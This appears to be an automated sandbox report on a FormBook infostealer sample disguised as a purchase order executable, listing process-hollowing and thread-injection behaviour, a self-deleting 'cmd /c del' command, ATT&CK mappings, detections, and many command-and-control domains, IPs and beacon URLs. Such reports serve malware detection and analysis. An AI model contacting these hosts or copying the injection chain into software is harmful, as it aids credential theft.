          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045$.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3292Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 140000Jump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000002.00000000.254074114.0000000005F40000.00000004.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.501463213.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: GetLocaleInfoA,0_2_013EC95A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_013E81CA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_013E883F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_013E8B37
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_013EC321
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_013E8B73
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_013E8A10
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_013E5A51
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_013EC247
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_013E7280
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_013E8AD0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_013DECBB
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_013E873D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_013E87E4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_013E8648
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_013E7EDC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013DC26F GetSystemTimeAsFileTime,__aulldiv,0_2_013DC26F

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemorySecurity Software Discovery141Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321097 Sample: Purchase Order 40,7045$.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 34 www.handsfreedocs.com 2->34 36 www.lotoencasa.com 2->36 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 7 other signatures 2->46 11 Purchase Order 40,7045$.exe 2->11         started        signatures3 process4 signatures5 54 Maps a DLL or memory area into another process 11->54 14 Purchase Order 40,7045$.exe 11->14         started        process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 28 www.realitytvstockwatch.com 103.224.182.242, 49761, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->28 30 searchnehomes.com 34.102.136.180, 49763, 80 GOOGLEUS United States 17->30 32 22 other IPs or domains 17->32 38 System process connects to network (likely due to code injection or exploit) 17->38 21 ipconfig.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase Order 40,7045$.exe43%VirustotalBrowse
          Purchase Order 40,7045$.exe36%ReversingLabs
          Purchase Order 40,7045$.exe100%AviraTR/AD.Swotter.vxbef
          Purchase Order 40,7045$.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.Purchase Order 40,7045$.exe.2f40000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.Purchase Order 40,7045$.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          sweetbasilmarketing.com2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.the-gongs.com/igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.fahufu.com/igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.hemparcade.com/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://yuyabo.com/0%Avira URL Cloudsafe
          http://www.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.hemparcade.com0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.hemparcade.com/igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.placeduconfort.com/igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.maninhatphoto.com/igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.happinestbuilders.com/igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.shopnicknaks.com/igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.realitytvstockwatch.com
          		103.224.182.242
          		truetrue
            		unknown
            www.the-gongs.com
            		104.253.79.71
            		truetrue
              		unknown
              td-balancer-euw2-6-109.wixdns.net
              		35.246.6.109
              		truetrue
                		unknown
                sweetbasilmarketing.com
                		185.201.11.126
                		truetrueunknown
                prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
                		3.12.202.18
                		truefalse
                  		high
                  www.maninhatphoto.com
                  		154.86.218.70
                  		truetrue
                    		unknown
                    fahufu.com
                    		194.35.122.226
                    		truetrue
                      		unknown
                      www.justsoldbykristen.com
                      		52.71.133.130
                      		truetrue
                        		unknown
                        heartandcrowncloset.com
                        		160.153.136.3
                        		truetrue
                          		unknown
                          searchnehomes.com
                          		34.102.136.180
                          		truetrue
                            		unknown
                            www.lotoencasa.com
                            		192.155.168.14
                            		truefalse
                              		unknown
                              www.ariasu-nakanokaikei.com
                              		13.226.173.80
                              		truetrue
                                		unknown
                                www.hemparcade.com
                                		52.58.78.16
                                		truetrue
                                  		unknown
                                  www.searchnehomes.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.heartandcrowncloset.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.fahufu.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.placeduconfort.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.handsfreedocs.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.shopnicknaks.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.happinestbuilders.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.sweetbasilmarketing.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.the-gongs.com/igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fahufu.com/igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hemparcade.com/igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.placeduconfort.com/igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.maninhatphoto.com/igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.happinestbuilders.com/igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.shopnicknaks.com/igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lrtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.comexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.hemparcade.com/ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://yuyabo.com/ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hemparcade.comipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tiro.comexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.goodfont.co.krexplorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
